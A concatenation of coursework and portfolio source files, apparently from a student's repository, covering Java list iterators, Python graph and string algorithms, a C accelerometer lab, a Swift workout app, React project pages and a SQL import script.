private ListNode cur; // node at index - 1
private ListNode last; // node last visited by next() or previous()
private boolean calledNext = false;
private int calledPrev = 2;
private boolean calledAdd = false;
private boolean canRemove = false;
private boolean calledRemove = false;
/**
* Default constructor for ListIterator
*/
public AdaptiveListIterator() {
if (!linkedUTD)
updateLinked();
// TODO
index = 0;
cur = head.link;
}
/**
* Constructor used for taking a position input. cur is set to the corresponding node
* at pos
* @param pos
*/
public AdaptiveListIterator(int pos) {
if (!linkedUTD)
updateLinked();
// TODO
index = pos;
ListNode node = head.link;
for (int i = 0; i < pos; i++) {
node = node.link;
}
cur = node;
}
/**
* Returns true if this list iterator has more elements when traversing the list in
* the forward direction.
* @return true if the list iterator has more elements when traversing
* the list in the forward direction
*/
@Override
public boolean hasNext() {
// TODO
if (cur == tail || (tail.prev == cur && (calledNext))) {
return false;
}
else {
return true;
}
}
/**
* Returns the next element in the list and advances the cursor position.
* @return the next element in the list
*/
@Override
public E next() throws NoSuchElementException {
// TODO
calledAdd = false;
canRemove = true;
calledRemove = false;
if (cur == tail) {
throw new NoSuchElementException("Iteration has no next element");
}
else {
calledNext = true;
if(calledPrev == 2 || calledPrev == 1){
calledPrev = 0;
index++;
return cur.data;
}
else{
last = cur;
cur = cur.link;
index++;
return cur.data;
}
}
}
/**
* Returns true if this list iterator has more elements when traversing the list
* in the reverse direction.
* @return true if the list iterator has more elements when traversing the list in the reverse direction
*/
@Override
public boolean hasPrevious() {
// TODO
if (cur == head.link) {
return false;
}
else {
return true;
}
}
/**
* Returns the previous element in the list and moves the cursor position backwards.
* @return the previous element in the list
*/
@Override
public E previous() throws NoSuchElementException {
// TODO
calledAdd = false;
canRemove = true;
calledRemove = false;
if (cur == head.link && (calledPrev == 1 || calledPrev == 2)) {
throw new NoSuchElementException("Iteration has no previous element");
}
else {
calledPrev = 1;
if(calledNext){
calledNext = false;
index--;
return cur.data;
}
else{
last = cur;
cur = cur.prev;
index--;
return cur.data;
}
}
}
/**
* Returns the index of the element that would be returned by a subsequent call to next()
* @return he index of the element that would be returned by a subsequent call to next, or
* list size if the list iterator is at the end of the list
*/
@Override
public int nextIndex() {
// TODO
return index;
}
/**
* Returns the index of the element that would be returned by a subsequent call to previous().
* @return the index of the element that would be returned by a subsequent call to previous,
* or -1 if the list iterator is at the beginning of the list
*/
@Override
public int previousIndex() {
// TODO
if (index == 0) {
return -1;
} else {
return index - 1;
}
}
/**
* Removes from the list the last element that was returned by next() or previous()
*/
public void remove() throws IllegalStateException {
// TODO
if (canRemove && !calledAdd ) {
canRemove = false;
calledRemove = true;
if(calledPrev == 2 || calledPrev == 1){
ListNode toCur = cur.link;
unlink(cur);
cur = toCur;
}
if(calledNext){
ListNode toCur = cur.prev;
unlink(cur);
cur = toCur;
}
} else {
throw new IllegalStateException(
"You did not call next or previous, or you called add after you called next or previous");
}
}
/**
* Inserts the specified element into the list (optional operation). The element is
* inserted immediately before the element that would be returned by next(),
* if any, and after the element that would be returned by previous()
* @param e - the element to insert
*/
public void add(E obj) {
// TODO
if (isEmpty()) {
ListNode newNode = new ListNode(obj);
link(head, newNode);
index++;
}
else {
calledAdd = true;
if(calledNext){
ListNode newNode = new ListNode(obj);
link(cur, newNode);
cur = newNode;
index++;
}
if(calledPrev == 1 || calledPrev == 2){
ListNode newNode = new ListNode(obj);
link(cur.prev, newNode);
index++;
}
}
}
/**
* Replaces the last element returned by next() or previous() with the specified element
* @param e - the element with which to replace the last element returned by next or previous
*/
@Override
public void set(E obj) throws IllegalStateException{
// TODO
if (!calledRemove && !calledAdd && (calledPrev == 1 || calledNext)) {
ListNode replace = new ListNode(obj);
cur.data = replace.data;
}
else{
throw new IllegalStateException("Called remove() or add() after call to next or previous");
}
}
}
@Override
public boolean equals(Object obj) {
if (!linkedUTD)
updateLinked();
if ((obj == null) || !(obj instanceof List<?>))
return false;
List<?> list = (List<?>) obj;
if (list.size() != numItems)
return false;
Iterator<?> iter = list.iterator();
for (ListNode tmp = head.link; tmp != tail; tmp = tmp.link) {
if (!iter.hasNext())
return false;
Object t = iter.next();
if (!(t == tmp.data || t != null && t.equals(tmp.data)))
return false;
}
if (iter.hasNext())
return false;
return true;
} // equals
@Override
public Iterator<E> iterator() {
return new AdaptiveListIterator();
}
@Override
public ListIterator<E> listIterator() {
return new AdaptiveListIterator();
}
@Override
public ListIterator<E> listIterator(int pos) {
checkIndex2(pos);
return new AdaptiveListIterator(pos);
}
// Adopted from the List<E> interface.
@Override
public int hashCode() {
if (!linkedUTD)
updateLinked();
int hashCode = 1;
for (E e : this)
hashCode = 31 * hashCode + (e == null ? 0 : e.hashCode());
return hashCode;
}
// You should use the toString*() methods to see if your code works as
// expected.
@Override
public String toString() {
String eol = System.getProperty("line.separator");
return toStringArray() + eol + toStringLinked();
}
public String toStringArray() {
String eol = System.getProperty("line.separator");
StringBuilder strb = new StringBuilder();
strb.append("A sequence of items from the most recent array:" + eol);
strb.append('[');
if (theArray != null)
for (int j = 0; j < theArray.length;) {
if (theArray[j] != null)
strb.append(theArray[j].toString());
else
strb.append("-");
j++;
if (j < theArray.length)
strb.append(", ");
}
strb.append(']');
return strb.toString();
}
public String toStringLinked() {
return toStringLinked(null);
}
// iter can be null.
public String toStringLinked(ListIterator<E> iter) {
int cnt = 0;
int loc = iter == null ? -1 : iter.nextIndex();
String eol = System.getProperty("line.separator");
StringBuilder strb = new StringBuilder();
strb.append("A sequence of items from the most recent linked list:" + eol);
strb.append('(');
for (ListNode cur = head.link; cur != tail;) {
if (cur.data != null) {
if (loc == cnt) {
strb.append("| ");
loc = -1;
}
strb.append(cur.data.toString());
cnt++;
if (loc == numItems && cnt == numItems) {
strb.append(" |");
loc = -1;
}
} else
strb.append("-");
cur = cur.link;
if (cur != tail)
strb.append(", ");
}
strb.append(')');
return strb.toString();
}
}<file_sep>/src/ClassComponents/ComS311/Project2/q1.py
def longest_common_substring(s1, s2):
"""function for finding the LCS through recurison"""
cache = [[None for i in range(len(s2) + 1)] for j in range(len(s1) + 1)]
def recurse(s1, s2):
"""recursive helper function"""
if len(s1) == 0 or len(s2) == 0:
return ""
else:
a = s1[len(s1) - 1]
b = s2[len(s2) - 1]
if a == b:
if cache[len(s1)][len(s2)] != None:
return cache[len(s1)][len(s2)]
else:
s = recurse(s1[:len(s1) - 1], s2[:len(s2) - 1])
s = s + a
cache[len(s1)][len(s2)] = s
return s
if a != b:
one = None
two = None
if cache[len(s1) - 1][len(s2)] != None:
one = cache[len(s1) - 1][len(s2)]
else:
one = recurse(s1[:len(s1) - 1], s2)
cache[len(s1) - 1][len(s2)] = one
if cache[len(s1)][len(s2) - 1] != None:
two = cache[len(s1)][len(s2) - 1]
else:
two = recurse(s1, s2[:len(s2) - 1])
cache[len(s1)][len(s2) - 1] = two
if len(one) >= len(two):
return one
elif len(two) > len(one):
return two
return recurse(s1, s2)
s1 = "Look at me, I can fly!"
s2 = "Look at that, it's a fly"
s3 = "them"
s4 = "tim"
s5 = "abcdefghijklmnopqrstuvwxyz"
s6 = "ABCDEFGHIJKLMNOPQRSTUVWXYS"
s7 = "balderdash!"
s8 = "balderdash!"
s9 = "Solidandkeen\nSolidandkeen\nSolidandkeen\n"
s10 = "Whoisn'tsick\nWhoisn'tsick\nWhoisn'tsick"
lcs = longest_common_substring(s9, s10)
#print(lcs)
#print(repr(lcs))
print(longest_common_substring(s3, s4))<file_sep>/src/ClassComponents/CPRE185/Lab6/lab6.c
#include <stdio.h>
#include <math.h>
#define TRUE 1
double seconds(double ms);
int mag(double x, double y, double z);
int closeto(double tolerance, double point, double value);
double othermag(double x, double y, double z);
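/*
 * Reads "time_ms,ax,ay,az" accelerometer samples from stdin, waits for the
 * acceleration magnitude to leave roughly 1 g (the fall starts), integrates
 * the measured acceleration while it stays away from 1 g, and then compares
 * the resulting fall distance with the ideal 0.5*g*t^2 estimate.
 */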
int main (){
double t;
double ax;
double ay;
double az;
double fallstart;
double fallstop;
double falltime;
double distance;
int num = 0;
int num2 = 0;
double newV = 0;
double oldT;
double newT;
double newD = 0;
double difference;
scanf("%lf,%lf,%lf,%lf", &t, &ax, &ay, &az);
printf("Ok im recieving data\n");
printf("Im waiting");
while (mag(ax, ay, az) == 0){
if ((num % 100) == 0){
printf(".");
}
scanf("%lf,%lf,%lf,%lf", &t, &ax, &ay, &az);
++num;
fflush(stdout);
}
printf("\n");
fallstart = t;
printf("help me! Im falling");
while (mag(ax, ay, az) == 1){
oldT = seconds(t);
if ((num2 % 100) == 0){
printf("!");
}
scanf("%lf,%lf,%lf,%lf", &t, &ax, &ay, &az);
++num2;
newT = seconds(t);
newV = newV + (9.8 * ((1 - othermag(ax, ay, az)) * (newT - oldT)));
newD = newD + (newV * (newT - oldT));
fflush(stdout);
}
printf("\n");
fallstop = t;
falltime = seconds(fallstop - fallstart);
distance = .5 * 9.8 * falltime * falltime;
difference = 100 - ((newD / distance) * 100);
printf("Ouch, I fell %lf meter in %lf seconds\n", distance, falltime);
printf("Compensating for air resistance, the fall was %lf meters.\n", newD);
printf("This is %lf percent less than computed before\n", difference);
}
double seconds(double ms){
double seconds;
seconds = ms / 1000;
return seconds;
}
int closeto(double tolerance, double point, double value){
if(tolerance > fabs(point - value)){
return 1;
}
else {
return 0;
}
}
int mag(double x, double y, double z){
double mag;
mag = sqrt((x * x) + (y * y) + (z * z));
if (closeto(.13, 1, mag) == 1){
return 0;
}
else {
return 1;
}
}
double othermag(double x, double y, double z){
double mag;
mag = sqrt((x * x) + (y * y) + (z * z));
return mag;
}<file_sep>/src/Components/WorkoutApp/ExerciseViewController.swift
//
// ExerciseViewController.swift
// workoutApp
//
// Created by <NAME> on 1/6/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
import os.log
import CoreData
class ExerciseViewController: UIViewController {
//MARK: Instance Variables
private var exercises: [Exercise] = []
//MARK: Properties
@IBOutlet weak var name: UITextField!
@IBOutlet weak var reps0: UITextField!
@IBOutlet weak var reps1: UITextField!
@IBOutlet weak var reps2: UITextField!
@IBOutlet weak var reps3: UITextField!
@IBOutlet weak var weight0: UITextField!
@IBOutlet weak var weight1: UITextField!
@IBOutlet weak var weight2: UITextField!
@IBOutlet weak var weight3: UITextField!
@IBOutlet weak var endWorkout: UIButton!
@IBOutlet weak var nextExercise: UIButton!
override func viewDidLoad() {
super.viewDidLoad()
// Do any additional setup after loading the view.
}
    //MARK: Actions
@IBAction func nextExeriseButton(_ sender: UIButton) {
var reps: [Int] = [0,0,0,0]
var weights: [Int] = [0,0,0,0]
if reps0.text! != "" { reps[0] = Int(reps0.text!)! }
if reps1.text! != "" { reps[1] = Int(reps1.text!)! }
if reps2.text! != "" { reps[2] = Int(reps2.text!)! }
if reps3.text! != "" { reps[3] = Int(reps3.text!)! }
if weight0.text! != "" { weights[0] = Int(weight0.text!)! }
if weight1.text! != "" { weights[1] = Int(weight1.text!)! }
if weight2.text! != "" { weights[2] = Int(weight2.text!)! }
if weight3.text! != "" { weights[3] = Int(weight3.text!)! }
let exercise = Exercise(name: name.text!, reps: reps, weight: weights)
if exercise != nil {
exercises.append(exercise!)
name.text = ""
reps0.text = ""
reps1.text = ""
reps2.text = ""
reps3.text = ""
weight0.text = ""
weight1.text = ""
weight2.text = ""
weight3.text = ""
os_log("%@", exercise!.showName())
os_log("%@", exercise!.showReps())
os_log("%@", exercise!.showWeight())
}
}
@IBAction func endWorkout(_ sender: UIButton) {
let formatter : DateFormatter = DateFormatter()
formatter.dateFormat = "M/d/yyyy"
let date : String = formatter.string(from: NSDate.init(timeIntervalSinceNow: 0) as Date)
let workout = Workout(exercises: self.exercises, date: date)
Variables.workouts.append(workout!)
UserDefaults.standard.set(true, forKey: "appUsed")
//UserDefaults.standard.set(encodedData, forKey: "userWorkouts")
/*
guard let appDelegate = UIApplication.shared.delegate as? AppDelegate else { return }
let managedContext = appDelegate.persistentContainer.viewContext
let userEntity = NSEntityDescription.entity(forEntityName: "workouts", in: managedContext)!
let newUser = NSManagedObject(entity: userEntity, insertInto: managedContext)
newUser.setValue(Variables.workouts, forKey: "userWorkouts")
do { try managedContext.save() }
catch { print("Failed to save") }
*/
}
/*
// MARK: - Navigation
// In a storyboard-based application, you will often want to do a little preparation before navigation
override func prepare(for segue: UIStoryboardSegue, sender: Any?) {
// Get the new view controller using segue.destination.
// Pass the selected object to the new view controller.
}
*/
}
<file_sep>/src/Components/AWSAPI/config.java
package com.aws.codestar.projecttemplates.config;
import javax.sql.DataSource;
import org.springframework.boot.jdbc.DataSourceBuilder;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.PropertySource;
import org.springframework.transaction.annotation.EnableTransactionManagement;
import com.aws.codestar.projecttemplates.model.User;
@Configuration
@ComponentScan({ "com.aws.codestar.projecttemplates.config","com.aws.codestar.projecttemplates.dao" })
@PropertySource("classpath:application.properties")
@EnableTransactionManagement
public class config {
@Bean(name = "dataSource")
public DataSource datasource(){
return DataSourceBuilder.create()
.driverClassName("com.mysql.cj.jdbc.Driver")
.url("jdbc:mysql://test2.ciagitssmgru.us-east-2.rds.amazonaws.com:3306/test2")
.username("balex")
.password("<PASSWORD>")
.build();
}
}
<file_sep>/src/ClassComponents/ComS311/Project1/q1.py
def adapter_chain(adapters_info, charger_plug, wall_socket):
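    """Return a list of adapter/vertex ids connecting charger_plug to wall_socket,
    found by following the BFS tree of the graph described by adapters_info."""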
    adj_list = adjacency_list(adapters_info)
    parent = bfs_tree(adj_list, charger_plug)
    return tree_path(parent, charger_plug, wall_socket, [])
def tree_path(parent, s, t, path):
    # Walk the parent pointers back from t to s, then reverse so the chain
    # runs from the charger plug to the wall socket.
    if s == t:
        path.append(s)
        return list(reversed(path))
    path.append(t)
    return tree_path(parent, s, parent[t], path)
def adjacency_list(graph_str):
l = graph_str.splitlines()
edges = l[1:len(l)]
vertices = int(l[0].split()[1])
adj = []
for x in range(vertices):
nodeList = []
for y in range(len(edges)):
if int(edges[y].split()[0]) == x:
str = edges[y]
edgeTuple = (int(str.split()[1]), None)
nodeList.append(edgeTuple)
adj.append(nodeList)
return adj
def bfs_tree(adj_list, start):
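    """Run a breadth-first search from start and return the parent array of the BFS tree."""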
vertices = len(adj_list)
parent = []
state = []
queue = []
for x in range(vertices):
parent.append(None)
state.append('U')
state[start] = 'D'
queue.append(start)
return bfs_loop(adj_list, queue, state, parent)
def bfs_loop(adj_list, queue, state, parent):
while(len(queue) != 0):
vertex = queue.pop(0)
for v in adj_list[vertex]:
if state[v[0]] == 'U':
state[v[0]] = 'D'
parent[v[0]] = vertex
queue.append(v[0])
state[vertex] = 'P'
return parent
str1 = "D 6\n0 4\n4 3\n4 1\n1 5\n1 2"
print (adapter_chain(str1, 0, 5))<file_sep>/src/Components/ComS319/ComS319.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ProjectFiles from './assignment1.zip';
import GameMainJava from './GameMain.java';
import GameMainPNG from './GameMain.png';
import TicTacToe from './TicTacToe.java';
import TicTacToeSS1 from './TicTacToeSS1.png';
import TicTacToeSS2 from './TicTacToeSS2.png';
import UI1 from './UI1.png';
import UI2 from './UI2.png';
import UI3 from './UI3.png';
const Title = Typography.Title;
export default class ComS319 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Construction of User Interfaces - Com S 319</Title>
<Title level={2}>Tic-Tac-Toe Game in Java</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
For this assignment, I was tasked with creating a tic-tac-toe game with a working UI
using any language of my choice. I chose Java because of my class experience with it.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<img width='33%' src={UI1} alt=''/>
<img width='33%' src={UI2} alt=''/>
<img width='33%' src={UI3} alt=''/>
<Title level={4}>TicTacToe.java (click on image to download file)</Title>
<a href={TicTacToe} download="TicTacToe.java">
<img width='100%' src={TicTacToeSS1} alt=''/>
<img width='100%' src={TicTacToeSS2} alt=''/>
</a>
<Title level={4}>GameMain.java (click on image to download file)</Title>
<a href={GameMainJava} download="GameMain.java">
<img width='100%' src={GameMainPNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/About/About.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import './About.css';
import photo from './composite2019.jpg';
const Title = Typography.Title;
export default class About extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={16}>
<Title level={1} className="title">Software Engineer</Title>
</Col>
</Row>
<Row justify="end">
<Col span={12}>
Hello, my name is <NAME> and I'm a student at Iowa State majoring in
Software Engineering and graduating in November. I have a passion for finding
creative software solutions to challenging problems and I'm eager to continue
my career doing what I enjoy.<br></br><br></br>
<Title level={4} className="title">Specialties:</Title>
iOS Development, Java Springboot, Google Cloud Platform, MySQL
<Title level={4} className="title">Familier With:</Title>
React.JS, .NET Framework, Python, Android Development
</Col>
<Col span={8}>
<img width='100%' src={photo} className="photo" alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS311/Project1/q4.py
def which_walkways(campus_map):
adj = adj_list(campus_map)
parent = prim(adj, 0)
result = []
for x in range(len(parent)):
if parent[x] != None:
if parent[x] <= x:
pair = (parent[x], x)
result.append(pair)
if parent[x] > x:
pair = (x, parent[x])
result.append(pair)
return result
def adj_list(graph):
l = graph.splitlines()
edges = l[1:len(l)]
vertices = int(l[0].split()[1])
adj = []
for x in range(vertices):
nodeList = []
for y in range(len(edges)):
data = edges[y].split()
if int(data[0]) == x:
edge = (int(data[1]), int(data[2]))
nodeList.append(edge)
if int(data[1]) == x:
edge = (int(data[0]), int(data[2]))
nodeList.append(edge)
adj.append(nodeList)
return adj
def prim(adj, s):
n = len(adj)
in_tree = [False] * n
distance = [float('inf')] * n
parent = [None] * n
distance[s] = 0
while all(in_tree) == False:
u = next_vertex(in_tree, distance)
in_tree[u] = True
for v, weight in adj[u]:
if (not in_tree[v]) and (weight < distance[v]):
distance[v] = weight
parent[v] = u
return parent
def next_vertex(in_tree, distance):
false_indexes = []
count = 0
for x in in_tree:
if x == False:
false_indexes.append(count)
count += 1
smallest = distance[false_indexes[0]]
smallest_index = false_indexes[0]
for x in false_indexes:
current = distance[x]
if current < smallest:
smallest = current
smallest_index = x
return smallest_index
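# Worked example (for illustration): for str1 below ("U 3 W" with weighted edges
# 0-1 (1), 2-1 (2), 2-0 (4)), prim(adj_list(str1), 0) yields the parent array
# [None, 0, 1], so which_walkways(str1) returns the spanning-tree edges
# [(0, 1), (1, 2)] and skips the heavier 0-2 edge of weight 4.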
str0 = "U 6 W\n0 3 3\n0 4 1\n0 1 3\n1 4 1\n3 4 1\n4 5 1\n1 5 3\n1 2 3\n2 5 1"
str1 = "U 3 W\n0 1 1\n2 1 2\n2 0 4"
str2 = "U 1 W"
str3 = "U 4 W\n0 1 1\n0 2 2\n0 3 4\n2 1 4\n2 3 1\n1 3 2"
print(sorted(which_walkways(str3)))<file_sep>/src/ClassComponents/ComS227/A1/TelevisonTest.java
package hw1;
import hw1.Television;
public class TelevisonTest {
public static void main(String[] args){
Television tv = new Television(5);
System.out.println(tv.getVolume());
tv.volumeUp();
System.out.println(tv.getVolume());
tv.volumeDown();
tv.volumeDown();
System.out.println(tv.getVolume());
tv.setChannel(2);
tv.channelDown();
tv.channelDown();
System.out.println(tv.getChannel());
tv.volumeUp();
tv.volumeUp();
tv.setChannel(3);
System.out.println(tv.getVolume());
System.out.println(tv.display());
tv.channelUp();
tv.channelUp();
System.out.println(tv.getChannel());
tv.channelDown();
System.out.println(tv.getChannel());
}
}<file_sep>/src/Components/ComS309/ComS309.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import FrontendFiles from './ShoelaceFrontend.zip';
import BackendFiles from './ShoelaceBackend.zip';
import ShoelacePoster from './ShoelacePoster.png';
import MainActivity1 from './MainActivity1.png';
import MainActivity2 from './MainActivity2.png';
import RedditRest1 from './RedditRest1.png';
import RedditRest2 from './RedditRest2.png';
import RedditRest3 from './RedditRest3.png';
import UserController1 from './UserController1.png';
import UserController2 from './UserController2.png';
import AppLogin from './AppLogin.png';
const Title = Typography.Title;
export default class ComS309 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Android Development Project - Computer Science 309</Title>
<Title level={4}>Technologies: Java, Android Studio, Springboot, MySQL, Iowa State Server</Title>
<li>Created an Android-based social media app called "Shoelace" in a team of four</li>
<li>Combined the user's main feed from Facebook, Twitter, and Reddit into a single feed within the app</li>
<li>Responsible for creating the frontend UI such as the login, main feed, add post, and settings</li>
<li>Communicated with the Facebook, Twitter, and Reddit APIs from the frontend to get the user's feed information</li>
<li>Communicated with our school's server instance to store user information such as login, friend, and posting information</li>
<li>Implemented the ability to post to any of the three social medias within the app</li>
<li>Used Java Springboot to build our app's backend API</li>
<li>Successfully used Git to collaborate and develop with teammates</li>
<li>Used web sockets to implement a direct chatting feature</li>
<br></br>
<a href={FrontendFiles} download="Frontend_File.zip">Download Frontend Files</a>
<br></br>
<a href={BackendFiles} download="Backend_File.zip">Download Backend Files</a>
</Col>
</Row>
<Row justify="center">
<Col span={24}>
<img width='100%' src={ShoelacePoster} alt=''/>
<Title level={4}>MainActivity.java: Used for showing the main feed screen of the app</Title>
<img width='100%' src={MainActivity1} alt=''/>
<img width='100%' src={MainActivity2} alt=''/>
<Title level={4}>RedditRestClient.java: This allows a user to login to their Reddit account through Reddit's API using HTTP request methods</Title>
<img width='100%' src={RedditRest1} alt=''/>
<img width='100%' src={RedditRest2} alt=''/>
<img width='100%' src={RedditRest3} alt=''/>
<Title level={4}>AppLogin.java: Communicates with our server to retrieve the user's information for logging in</Title>
<img width='100%' src={AppLogin} alt=''/>
<Title level={4}>UserController: Server-side class that contains all the controller methods for the app</Title>
<img width='100%' src={UserController1} alt=''/>
<img width='100%' src={UserController2} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/ComS363/projectInsert.sql
-- For our project, we used the import wizard to import the data. See the "Insert Data" PDF for instructions.
use project;
SET FOREIGN_KEY_CHECKS = 0;
load data infile 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\mentioned.txt'
into table mentioned
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(tid,screen_name);
LOAD DATA INFILE 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\user.csv'
INTO TABLE useraccount
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(screen_name, name, subcategory, category, ofstate, numFollowers, numFollowing);
LOAD DATA INFILE 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\tweets.csv'
INTO TABLE tweet
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(tid,textbody,retweet_count,@col4,@col5,posting_user)
set day_posted= day(str_to_date(@col5, '%Y-%m-%d %H:%i:%s')),
month_posted= month(str_to_date(@col5, '%Y-%m-%d %H:%i:%s')),
year_posted= year(str_to_date(@col5, '%Y-%m-%d %H:%i:%s'));
LOAD DATA INFILE 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\urlused.csv'
INTO TABLE url
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(tid,url);
LOAD DATA INFILE 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\tagged.csv'
INTO TABLE hashtag
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(tid,hashtag_name);
SET FOREIGN_KEY_CHECKS = 1;<file_sep>/src/ClassComponents/CPRE185/Lab7/Lab7.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import lab7C from './lab7.c';
import ProjectFiles from './Lab7.zip';
import lab7output from './lab7output.PNG';
import lab7SS1 from './lab7SS1.png';
import lab7SS2 from './lab7SS2.png';
const Title = Typography.Title;
export default class Lab7 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Accelerometer Tilt Visualization - Lab 7</Title>
<Title level={4}>Technology: C, Arduino Esplora</Title>
For this lab, we used the accelerometer data coming from an Arduino Esplora to draw a
horizontally oriented bar graph of the magnitude of the pitch and the roll, using the
characters L and R. We used the buttons on the Esplora to switch between pitch and roll,
and another button to stop the program.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab7.c (click on image to download file)</Title>
<a href={lab7C} download="lab7.c">
<img width='100%' src={lab7SS1} alt=''/>
<img width='100%' src={lab7SS2} alt=''/>
</a>
<Title level={4}>Example Output</Title>
<img width='100%' src={lab7output} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/WorkoutApp/Workout.swift
//
// Workout.swift
// workoutApp
//
// Created by <NAME> on 1/16/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class Workout {
private var exercises: [Exercise] = []
private var date: String
init?(exercises: [Exercise], date: String){
self.date = date
self.exercises = exercises
}
func showDate() -> String {
return date
}
func showExercises() -> [Exercise] {
return exercises
}
}
<file_sep>/src/Components/WorkoutApp/WorkoutApp.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import Exercise from './Exercise.png';
import ExerciseSwift from './Exercise.swift';
import ExerciseModel from './ExerciseModel.png';
import ExerciseVC from './ExerciseViewController.swift';
import ExerciseViewSS1 from './ExerciseViewSS1.png';
import ExerciseViewSS2 from './ExerciseViewSS2.png';
import HistoryDetails from './HistoryDetails.png';
import HistoryPage from './HistoryPage.png';
import HistoryView from './HistoryView.png';
import HistoryViewController from './HistoryViewController.swift';
import Home from './Home.png';
import Storyboard from './Storyboard.png';
import Workout from './Workout.swift';
import WorkoutModel from './WorkoutModel.png';
import WorkoutView from './WorkoutView.png';
import WorkoutViewController from './WorkoutViewController.swift';
import ProjectFiles from './workoutApp.zip';
const Title = Typography.Title;
export default class WorkoutApp extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>iOS Development - Workout App</Title>
<Title level={4}>Technology: Swift, Xcode</Title>
I had previously used Android for a class project (ComS 309), so I leveraged that experience
to make an iOS app. For this project, I made a workout app that someone can use to
start a workout, track exercises, and later view the workouts on a history page.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<img width='50%' src={Home} alt=''/>
<img width='50%' src={Exercise} alt=''/>
<br></br>
<img width='50%' src={HistoryPage} alt=''/>
<img width='50%' src={HistoryDetails} alt=''/>
<Title level={4}>Storyboard showing the screen flow</Title>
<img width='100%' src={Storyboard} alt=''/>
<Title level={4}>ExerciseViewController.swift (click on image to download file):</Title>
<a href={ExerciseVC} download="ExerciseViewController.swift">
<img width='100%' src={ExerciseViewSS1} alt=''/>
<img width='100%' src={ExerciseViewSS2} alt=''/>
</a>
<Title level={4}>HistoryViewController.swift (click on image to download file):</Title>
<a href={HistoryViewController} download="HistoryViewController.swift">
<img width='100%' src={HistoryView} alt=''/>
</a>
<Title level={4}>WorkoutViewController.swift (click on image to download file):</Title>
<a href={WorkoutViewController} download="WorkoutViewController.swift">
<img width='100%' src={WorkoutView} alt=''/>
</a>
<Title level={4}>Exercise.swift (click on image to download file):</Title>
<a href={ExerciseSwift} download="Exercise.swift">
<img width='100%' src={ExerciseModel} alt=''/>
</a>
<Title level={4}>Workout.swift (click on image to download file):</Title>
<a href={Workout} download="Workout.swift">
<img width='100%' src={WorkoutModel} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project1/DNASequence.java
package edu.iastate.cs228.hw1;
/*
* @author <NAME>
*/
public class DNASequence extends Sequence {
/**
* Creates a sequence object and uses the isValidLetter() method to check
 * if every character in the array sarr is valid. If so, it makes and keeps
* a copy of the array sarr in the field seqarr of type char[]. Otherwise,
* it throws an IllegalArgumentException.
* @param dnaarr
*/
public DNASequence(char[] dnaarr) {
super(dnaarr);
}
/**
* The method returns true if the character argument is equal to one
 * of the eight characters ’a’, ’A’, ’c’, ’C’, ’g’, ’G’, ’t’, and ’T’. Otherwise,
 * it returns false.
* @param a given character
* @return true if it's valid, false otherwise
*/
@Override
public boolean isValidLetter(char let) {
if(let == 'a' || let == 'A' || let == 'c' || let == 'C' || let == 'g' || let == 'G' || let == 't' || let == 'T'){
return true;
}
else{
return false;
}
}
/**
* The method produces the reverse complement of the DNA sequence
* saved in the char array seqarr, and returns a char array with the resulting sequence
* @return char array that is the reverse complement
*/
public char[] getReverseCompSeq() {
char[] reverse = new char[seqarr.length];
char[] clone = getSeq();
for(int i = 0; i < clone.length; i++){
reverse[i] = clone[clone.length - 1 - i];
}
for(int i = 0; i < reverse.length; i++){
if(reverse[i] == 'A'){
reverse[i] = 'T';
}
else if(reverse[i] == 'C'){
reverse[i] = 'G';
}
else if(reverse[i] == 'G'){
reverse[i] = 'C';
}
else if(reverse[i] == 'T'){
reverse[i] = 'A';
}
else if(reverse[i] == 'a'){
reverse[i] = 't';
}
else if(reverse[i] == 'c'){
reverse[i] = 'g';
}
else if(reverse[i] == 'g'){
reverse[i] = 'c';
}
else if(reverse[i] == 't'){
reverse[i] = 'a';
}
}
return reverse;
}
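	// Worked example (for illustration): for the sequence "AACG", reversing gives
	// "GCAA" and complementing each base then yields "CGTT", so getReverseCompSeq()
	// returns the reverse complement {'C', 'G', 'T', 'T'}.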
/**
